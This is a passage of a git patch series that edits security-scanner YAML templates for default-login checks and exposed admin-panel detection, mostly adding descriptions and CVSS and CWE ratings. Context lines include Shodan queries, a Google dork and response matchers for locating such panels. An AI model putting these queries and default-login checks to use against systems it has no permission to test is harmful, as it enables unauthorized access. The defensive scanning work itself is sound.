2023 14:12:30 -0400 Subject: [PATCH 023/609] Enhancement: default-logins/empire/empirec2-default-login.yaml by md --- default-logins/empire/empirec2-default-login.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/default-logins/empire/empirec2-default-login.yaml b/default-logins/empire/empirec2-default-login.yaml index 125868fb4a..62c15862eb 100644 --- a/default-logins/empire/empirec2-default-login.yaml +++ b/default-logins/empire/empirec2-default-login.yaml @@ -1,12 +1,17 @@ id: empirec2-default-login info: - name: Empire-C2 Default Login + name: Empire C2 Default Admin Login author: clem9669 severity: high + description: Empire C2 contains a default admin login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. reference: - https://github.com/BC-SECURITY/Empire - https://bc-security.gitbook.io/empire-wiki/quickstart/configuration/server + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: verified: true tags: default-login,empire @@ -42,3 +47,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/04/20 From 5998e24a8cc2ee113dca68a829b9afe71e6dd6a7 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 20 Apr 2023 14:16:24 -0400 Subject: [PATCH 024/609] Enhancement: default-logins/jboss/jboss-jbpm-default-login.yaml by md --- default-logins/jboss/jboss-jbpm-default-login.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/default-logins/jboss/jboss-jbpm-default-login.yaml b/default-logins/jboss/jboss-jbpm-default-login.yaml index 77555321ad..6bdbaaf1ff 100644 --- a/default-logins/jboss/jboss-jbpm-default-login.yaml +++ b/default-logins/jboss/jboss-jbpm-default-login.yaml @@ -1,10 +1,10 @@ id: jboss-jbpm-default-login info: - name: JBoss jBPM Administration Console Default Login + name: JBoss jBPM Administration Console Default Login - Detect author: DhiyaneshDk severity: high - description: JBoss jBPM Administration default login information was discovered. + description: JBoss jBPM Administration Console default login information was detected. reference: - https://github.com/PortSwigger/j2ee-scan/blob/master/src/main/java/burp/j2ee/issues/impl/JBossjBPMAdminConsole.java classification: @@ -63,3 +63,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/04/20 From e18b7ae3b1045aad3308d889fb0d2b452be7210d Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 20 Apr 2023 14:37:52 -0400 Subject: [PATCH 025/609] Enhancement: default-logins/magnolia-default-login.yaml by md --- default-logins/magnolia-default-login.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/default-logins/magnolia-default-login.yaml b/default-logins/magnolia-default-login.yaml index 65ea603279..38837aefd7 100644 --- a/default-logins/magnolia-default-login.yaml +++ b/default-logins/magnolia-default-login.yaml @@ -1,12 +1,16 @@ id: magnolia-default-login info: - name: Magnolia Default Login + name: Magnolia CMS Default Login - Detect author: pussycat0x severity: high - description: Mangnolia CMS default credentials were discovered. + description: Magnolia CMS default login credentials were detected. reference: - https://www.magnolia-cms.com/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-200 metadata: verified: "true" shodan-query: html:"Magnolia is a registered trademark" @@ -73,3 +77,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/04/20 From d4ba4382296ff9d56077b371a46aec41c90884d1 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 20 Apr 2023 14:41:03 -0400 Subject: [PATCH 026/609] Enhancement: default-logins/nagios/nagiosxi-default-login.yaml by md --- default-logins/nagios/nagiosxi-default-login.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/default-logins/nagios/nagiosxi-default-login.yaml b/default-logins/nagios/nagiosxi-default-login.yaml index 702edbbbd5..23dc9dfca0 100644 --- a/default-logins/nagios/nagiosxi-default-login.yaml +++ b/default-logins/nagios/nagiosxi-default-login.yaml @@ -1,10 +1,10 @@ id: nagiosxi-default-login info: - name: NagiosXI - Default Login + name: Nagios XI Default Admin Login - Detect author: ritikchaddha severity: critical - description: NagiosXI default admin credentials were discovered. + description: Nagios XI default admin login credentials were detected. reference: - https://nagiosxi.demos.nagios.com/nagiosxi/login.php?redirect=/nagiosxi/index.php%3f&noauth=1 classification: @@ -67,3 +67,5 @@ requests: regex: - 'name="nsp" value="(.*)">' internal: true + +# Enhanced by md on 2023/04/20 From 541da858fdc1a5486d3f7ab285982325beaca95f Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 20 Apr 2023 14:43:53 -0400 Subject: [PATCH 027/609] Enhancement: default-logins/trassir/trassir-default-login.yaml by md --- default-logins/trassir/trassir-default-login.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/default-logins/trassir/trassir-default-login.yaml b/default-logins/trassir/trassir-default-login.yaml index b48ced44ab..69ca361878 100644 --- a/default-logins/trassir/trassir-default-login.yaml +++ b/default-logins/trassir/trassir-default-login.yaml @@ -1,11 +1,11 @@ id: trassir-default-login info: - name: Trassir Webview - Default Login + name: Trassir WebView Default Login - Detect author: gtrrnr,metascan severity: high description: | - Trassir contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. + Trassir WebView contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. reference: - https://confluence.trassir.com/display/TKB/How+to+reset+the+administrator+password+on+the+TRASSIR+NVR classification: @@ -51,3 +51,5 @@ http: - type: status status: - 200 + +# Enhanced by md on 2023/04/20 From 25dc9d048406954af3e72fde67ebacc654e91d99 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 20 Apr 2023 14:44:16 -0400 Subject: [PATCH 028/609] Enhancement: default-logins/adminer-default-login.yaml by md --- default-logins/adminer-default-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/adminer-default-login.yaml b/default-logins/adminer-default-login.yaml index 5a365569bd..5f2eb3b864 100644 --- a/default-logins/adminer-default-login.yaml +++ b/default-logins/adminer-default-login.yaml @@ -1,7 +1,7 @@ id: adminer-default-login info: - name: Adminer - Default Login + name: Adminer Default Login - Detect author: j4vaovo severity: high description: | From 25c6e4fb4478dd2c6867000a5508995547aca304 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 20 Apr 2023 14:44:37 -0400 Subject: [PATCH 029/609] Enhancement: default-logins/empire/empirec2-default-login.yaml by md --- default-logins/empire/empirec2-default-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/empire/empirec2-default-login.yaml b/default-logins/empire/empirec2-default-login.yaml index 62c15862eb..a52a21389a 100644 --- a/default-logins/empire/empirec2-default-login.yaml +++ b/default-logins/empire/empirec2-default-login.yaml @@ -1,7 +1,7 @@ id: empirec2-default-login info: - name: Empire C2 Default Admin Login + name: Empire C2 Default Admin Login - Detect author: clem9669 severity: high description: Empire C2 contains a default admin login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. From 3dc319ba80ef5b73bfc117bca84b96973ccd9f12 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 20 Apr 2023 14:48:02 -0400 Subject: [PATCH 030/609] Enhancement: dns/dmarc-detect.yaml by md --- dns/dmarc-detect.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/dns/dmarc-detect.yaml b/dns/dmarc-detect.yaml index 9aa256380d..fa0c254f33 100644 --- a/dns/dmarc-detect.yaml +++ b/dns/dmarc-detect.yaml @@ -1,14 +1,18 @@ id: dmarc-detect info: - name: DNS DMARC Detection + name: DNS DMARC - Detect author: juliosmelo severity: info description: | - DMARC is an open email authentication protocol that provides domain-level protection of the email channel. DMARC authentication detects and prevents email spoofing techniques used in phishing, business email compromise (BEC) and other email-based attacks. + DNS DMARC information was detected. reference: - https://dmarc.org/ - https://dmarc.org/wiki/FAQ#Why_is_DMARC_important.3F + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: dns,dmarc dns: @@ -20,3 +24,5 @@ dns: group: 1 regex: - "IN\tTXT\t(.+)" + +# Enhanced by md on 2023/04/20 From 4df25634b3963948ef4abd4540b5d9471bb03c4f Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 20 Apr 2023 14:49:09 -0400 Subject: [PATCH 031/609] Enhancement: exposed-panels/appwrite-panel.yaml by md --- exposed-panels/appwrite-panel.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/exposed-panels/appwrite-panel.yaml b/exposed-panels/appwrite-panel.yaml index 8cf98d96c9..c8b2ae9c12 100644 --- a/exposed-panels/appwrite-panel.yaml +++ b/exposed-panels/appwrite-panel.yaml @@ -5,6 +5,10 @@ info: author: ritikchaddha severity: info description: Appwrite login panel was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: "true" shodan-query: http.favicon.hash:-633108100 @@ -21,3 +25,5 @@ requests: - type: dsl dsl: - "status_code==200 && (\"-633108100\" == mmh3(base64_py(body)))" + +# Enhanced by md on 2023/04/20 From e703d03ee0b9106c7e7831bfa3471adf3414a11a Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 20 Apr 2023 14:50:45 -0400 Subject: [PATCH 032/609] Enhancement: exposed-panels/aspect-control-panel.yaml by md --- exposed-panels/aspect-control-panel.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/exposed-panels/aspect-control-panel.yaml b/exposed-panels/aspect-control-panel.yaml index c7b4b2afcf..d4ef25f710 100644 --- a/exposed-panels/aspect-control-panel.yaml +++ b/exposed-panels/aspect-control-panel.yaml @@ -1,11 +1,15 @@ id: aspect-control-panel info: - name: ASPECT Control Panel - Detect + name: ASPECT Control Panel Login - Detect author: JustaAcat severity: info description: | - ASPECT Control login Panel was detected. + ASPECT Control Panel login was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: "true" shodan-query: http.favicon.hash:1011076161 @@ -25,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/04/20 From c8e2de410cb62ff6740ed8228eeabed452dff967 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 25 Apr 2023 10:56:55 -0400 Subject: [PATCH 033/609] Enhancement: exposed-panels/axway-securetransport-panel.yaml by md --- exposed-panels/axway-securetransport-panel.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/exposed-panels/axway-securetransport-panel.yaml b/exposed-panels/axway-securetransport-panel.yaml index e3ae8ee8e9..1579c78077 100644 --- a/exposed-panels/axway-securetransport-panel.yaml +++ b/exposed-panels/axway-securetransport-panel.yaml @@ -8,6 +8,10 @@ info: AXWAY Secure Transport login panel was detected. reference: - https://www.axway.com/en/products/managed-file-transfer/securetransport + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: "true" shodan-query: http.title:"SecureTransport" || http.favicon.hash:1330269434 @@ -41,3 +45,5 @@ requests: group: 1 regex: - '"SecureTransport", "([0-9.]+)",' + +# Enhanced by md on 2023/04/25 From 8e6b29ea05038809516275576c05dcaddc779f8e Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 25 Apr 2023 10:59:52 -0400 Subject: [PATCH 034/609] Enhancement: exposed-panels/axway-securetransport-webclient.yaml by md --- exposed-panels/axway-securetransport-webclient.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/exposed-panels/axway-securetransport-webclient.yaml b/exposed-panels/axway-securetransport-webclient.yaml index 0bb313af86..0710ef5b10 100644 --- a/exposed-panels/axway-securetransport-webclient.yaml +++ b/exposed-panels/axway-securetransport-webclient.yaml @@ -1,12 +1,16 @@ id: axway-securetransport-webclient info: - name: AXWAY Secure Transport Web Client Panel - Detect + name: Axway SecureTransport Web Client Panel - Detect author: righettod severity: info description: AXWAY Secure Transport Web Client panel was detected. reference: - https://www.axway.com/en/products/managed-file-transfer/securetransport + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true google-dork: intitle:"ST Web Client" @@ -27,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/04/25 From cbd93e2d00625d054609ade72e15b627cd423ff1 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 25 Apr 2023 11:00:24 -0400 Subject: [PATCH 035/609] Enhancement: exposed-panels/axway-securetransport-panel.yaml by md --- exposed-panels/axway-securetransport-panel.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposed-panels/axway-securetransport-panel.yaml b/exposed-panels/axway-securetransport-panel.yaml index 1579c78077..80df6e007c 100644 --- a/exposed-panels/axway-securetransport-panel.yaml +++ b/exposed-panels/axway-securetransport-panel.yaml @@ -1,11 +1,11 @@ id: axway-securetransport-panel info: - name: AXWAY Secure Transport Panel - Detect + name: Axway SecureTransport Login Panel - Detect author: righettod severity: info description: | - AXWAY Secure Transport login panel was detected. + AXWAY SecureTransport login panel was detected. reference: - https://www.axway.com/en/products/managed-file-transfer/securetransport classification: From c87e65041e1bf98f722b196bb407d6526530f0a8 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 25 Apr 2023 11:02:48 -0400 Subject: [PATCH 036/609] Enhancement: exposed-panels/caton-network-manager-system.yaml by md --- exposed-panels/caton-network-manager-system.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/exposed-panels/caton-network-manager-system.yaml b/exposed-panels/caton-network-manager-system.yaml index 175e3aa7b9..cf1a06d88e 100644 --- a/exposed-panels/caton-network-manager-system.yaml +++ b/exposed-panels/caton-network-manager-system.yaml @@ -1,9 +1,14 @@ id: caton-network-manager-system info: - name: Caton Network Manager System + name: Caton Network Manager System Login Panel - Detect author: pussycat0x severity: info + description: Caton Network Manager System login panel was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: "true" shodan-query: http.title:"Caton Network Manager System" @@ -24,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/04/25 From e4e03f411f2a633eae0cd55877aabac58a1a5475 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 25 Apr 2023 11:04:36 -0400 Subject: [PATCH 037/609] Enhancement: exposed-panels/craftcms-admin-panel.yaml by md --- exposed-panels/craftcms-admin-panel.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/exposed-panels/craftcms-admin-panel.yaml b/exposed-panels/craftcms-admin-panel.yaml index 8496090f95..c61171e24c 100644 --- a/exposed-panels/craftcms-admin-panel.yaml +++ b/exposed-panels/craftcms-admin-panel.yaml @@ -29,3 +29,5 @@ requests: part: body words: - ' Date: Tue, 25 Apr 2023 11:06:24 -0400 Subject: [PATCH 038/609] Enhancement: exposed-panels/dynatrace-panel.yaml by md --- exposed-panels/dynatrace-panel.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/exposed-panels/dynatrace-panel.yaml b/exposed-panels/dynatrace-panel.yaml index 70e3ce3e42..9f14b08a3e 100644 --- a/exposed-panels/dynatrace-panel.yaml +++ b/exposed-panels/dynatrace-panel.yaml @@ -5,7 +5,11 @@ info: author: ja1sh severity: info description: | - Dynatrace | Simplify cloud complexity and innovate faster and more efficiently with observability, security, and AIOps in one platform. + Dynatrace login panel was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: "true" shodan-query: http.favicon.hash:1828614783 @@ -26,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/04/25 From 6cdca08a50b9443f2fa198d4fe643fe739f4bbd5 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 25 Apr 2023 11:10:48 -0400 Subject: [PATCH 039/609] Enhancement: exposed-panels/dzzoffice/dzzoffice-install.yaml by md --- exposed-panels/dzzoffice/dzzoffice-install.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/exposed-panels/dzzoffice/dzzoffice-install.yaml b/exposed-panels/dzzoffice/dzzoffice-install.yaml index 056429d268..44adb49cc1 100644 --- a/exposed-panels/dzzoffice/dzzoffice-install.yaml +++ b/exposed-panels/dzzoffice/dzzoffice-install.yaml @@ -1,9 +1,14 @@ id: dzzoffice-install info: - name: DzzOffice Exposed Installation + name: DzzOffice Installation Panel - Detect author: ritikchaddha severity: high + description: DzzOffice installation panel was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.favicon.hash:-1961736892 @@ -32,3 +37,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/04/25 From ecb125ae6748f6989e80d6689b1cbd36d933106c Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 25 Apr 2023 11:14:33 -0400 Subject: [PATCH 040/609] Enhancement: exposed-panels/elemiz-network-manager.yaml by md --- exposed-panels/elemiz-network-manager.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/exposed-panels/elemiz-network-manager.yaml b/exposed-panels/elemiz-network-manager.yaml index 04a7d11c0d..2873048de3 100644 --- a/exposed-panels/elemiz-network-manager.yaml +++ b/exposed-panels/elemiz-network-manager.yaml @@ -1,9 +1,14 @@ id: elemiz-network-manager info: - name: Elemiz Network Manager + name: Elemiz Network Manager Login Panel - Detect author: pussycat0x severity: info + description: Elemiz Network Manager login panel was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: "true" shodan-query: title:"Elemiz Network Manager" @@ -24,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/04/25 From 55ae8bfcc53aa3646921064dd8286e9bdea69a64 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 25 Apr 2023 11:18:38 -0400 Subject: [PATCH 041/609] Enhancement: exposed-panels/ewm-manager-panel.yaml by md --- exposed-panels/ewm-manager-panel.yaml | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/exposed-panels/ewm-manager-panel.yaml b/exposed-panels/ewm-manager-panel.yaml index b7d5771ed3..586ac3341c 100644 --- a/exposed-panels/ewm-manager-panel.yaml +++ b/exposed-panels/ewm-manager-panel.yaml @@ -1,9 +1,14 @@ id: ewm-manager-panel info: - name: EWM Manager Panel + name: EWM Manager Login Panel - Detect author: pussycat0x severity: info + description: EWM Manager login panel was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"EWM Manager" @@ -29,4 +34,6 @@ requests: - type: regex part: body regex: - - "EWM Manager ([0-9.]+)" \ No newline at end of file + - "EWM Manager ([0-9.]+)" + +# Enhanced by md on 2023/04/25 From 631b4c48cd4f27bf078e1ba2273d42f36dfae885 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 25 Apr 2023 11:20:23 -0400 Subject: [PATCH 042/609] Enhancement: exposed-panels/exagrid-manager-panel.yaml by md --- exposed-panels/exagrid-manager-panel.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/exposed-panels/exagrid-manager-panel.yaml b/exposed-panels/exagrid-manager-panel.yaml index fc0a954fad..6306d5a056 100644 --- a/exposed-panels/exagrid-manager-panel.yaml +++ b/exposed-panels/exagrid-manager-panel.yaml @@ -1,9 +1,14 @@ id: exagrid-manager-panel info: - name: ExaGrid Manager Panel + name: ExaGrid Manager Login Panel - Detect author: pussycat0x severity: info + description: ExaGrid Manager login panel was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"ExaGrid Manager" @@ -31,3 +36,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/04/25 From 36b82539e467f314e8e15a781be74b4d9d4a7b75 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 25 Apr 2023 11:45:46 -0400 Subject: [PATCH 043/609] Enhancement: exposed-panels/fortinet/fortinet-fortimanager-panel.yaml by md --- exposed-panels/fortinet/fortinet-fortimanager-panel.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/exposed-panels/fortinet/fortinet-fortimanager-panel.yaml b/exposed-panels/fortinet/fortinet-fortimanager-panel.yaml index b1e926dd6e..e74fa5aa13 100644 --- a/exposed-panels/fortinet/fortinet-fortimanager-panel.yaml +++ b/exposed-panels/fortinet/fortinet-fortimanager-panel.yaml @@ -5,7 +5,7 @@ info: author: johnk3r severity: info description: | - FortiManager enables centralized management with automation-driven network configuration, visibility, and security policy management. + Fortinet FortiManager panel was detected. reference: - https://www.fortinet.com/br/products/management/fortimanager classification: @@ -36,3 +36,5 @@ requests: group: 1 regex: - '(.*?)' + +# Enhanced by md on 2023/04/25 From 953ebc21a7b0441aa90383eaa50789bdddc0378c Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 25 Apr 2023 11:50:40 -0400 Subject: [PATCH 044/609] Enhancement: exposed-panels/fortinet/fortinet-fortinac-panel.yaml by md --- exposed-panels/fortinet/fortinet-fortinac-panel.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/exposed-panels/fortinet/fortinet-fortinac-panel.yaml b/exposed-panels/fortinet/fortinet-fortinac-panel.yaml index df447a1914..a5a343beb0 100644 --- a/exposed-panels/fortinet/fortinet-fortinac-panel.yaml +++ b/exposed-panels/fortinet/fortinet-fortinac-panel.yaml @@ -1,9 +1,14 @@ id: fortinet-fortinac-panel info: - name: Fortinet FortiNAC Panel + name: Fortinet FortiNAC Login Panel - Detect author: johnk3r severity: info + description: Fortinet FortiNAC login panel was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: "true" shodan-query: http.title:"Fortinac" @@ -32,3 +37,5 @@ requests: part: body regex: - '"version":"([0-9.]+)"' + +# Enhanced by md on 2023/04/25 From eda396417ef97cdd2214255f3d1127785be3f79c Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 25 Apr 2023 11:54:54 -0400 Subject: [PATCH 045/609] Enhancement: exposed-panels/freeipa-panel.yaml by md --- exposed-panels/freeipa-panel.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/exposed-panels/freeipa-panel.yaml b/exposed-panels/freeipa-panel.yaml index 38bc3c71d5..338095f67b 100644 --- a/exposed-panels/freeipa-panel.yaml +++ b/exposed-panels/freeipa-panel.yaml @@ -1,9 +1,14 @@ id: freeipa-panel info: - name: FreeIPA Identity Management Panel - Detect + name: FreeIPA Identity Management Login Panel - Detect author: DhiyaneshDk severity: info + description: FreeIPA Identity Management login panel was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: "true" shodan-query: html:"FreeIPA" @@ -27,3 +32,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/04/25 From 3fbecf5d5175054723b409b3ab5043f431b6c1bd Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 25 Apr 2023 11:57:52 -0400 Subject: [PATCH 046/609] Enhancement: exposed-panels/gnu-mailman.yaml by md --- exposed-panels/gnu-mailman.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/exposed-panels/gnu-mailman.yaml b/exposed-panels/gnu-mailman.yaml index 48045aaafa..a1d0575c10 100644 --- a/exposed-panels/gnu-mailman.yaml +++ b/exposed-panels/gnu-mailman.yaml @@ -1,11 +1,15 @@ id: gnu-mailman info: - name: Exposed GNU Mailman - Detect + name: GNU Mailman Panel - Detect author: Matt Galligan severity: info description: | - Lists of all the public mailing. + GNU Mailman panel was detected. Panel exposes all public mailing lists on server. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: "true" shodan-query: title:"Mailing Lists" @@ -31,3 +35,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/04/25 From 3bdff93f6bc85d5725646fc60a22360f11b81157 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 25 Apr 2023 12:00:22 -0400 Subject: [PATCH 047/609] Enhancement: exposed-panels/group-ib-panel.yaml by md --- exposed-panels/group-ib-panel.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/exposed-panels/group-ib-panel.yaml b/exposed-panels/group-ib-panel.yaml index 84d719d211..8551f6cc3a 100644 --- a/exposed-panels/group-ib-panel.yaml +++ b/exposed-panels/group-ib-panel.yaml @@ -1,11 +1,16 @@ id: group-ib-panel info: - name: Group-IB Managed XDR Panel + name: Group-IB Managed XDR Login Panel - Detect author: DhiyaneshDK severity: info + description: Group-IB Managed XDR login panel was detected. reference: - https://www.facebook.com/photo/?fbid=566951735475350&set=a.467014098802448 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: "true" shodan-query: title:"Group-IB Managed XDR" @@ -26,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/04/25 From 6da033776b55a8a09c8cdcad90711885dce5cbc6 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 25 Apr 2023 12:04:57 -0400 Subject: [PATCH 048/609] Enhancement: exposed-panels/gryphon-login.yaml by md --- exposed-panels/gryphon-login.yaml | 13 +++++++++---- 1 file changed, 9 insertions(+), 4 deletions(-) diff --git a/exposed-panels/gryphon-login.yaml b/exposed-panels/gryphon-login.yaml index 0ca111fb77..0fe4f73fdb 100644 --- a/exposed-panels/gryphon-login.yaml +++ b/exposed-panels/gryphon-login.yaml @@ -1,11 +1,14 @@ id: gryphon-login info: - name: Gryphon Panel + name: Gryphon Panel - Detect author: pdteam severity: info - reference: - - https://gryphonconnect.com/software-release-updates/ + description: Gryphon router panel was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Gryphon" tags: gryphon,router @@ -21,4 +24,6 @@ requests: words: - 'Gryphon' - 'Welcome to GryphonCare' - condition: or \ No newline at end of file + condition: or + +# Enhanced by md on 2023/04/25 From ffa41c918a8420be189a09a3ad55488696867a6a Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: 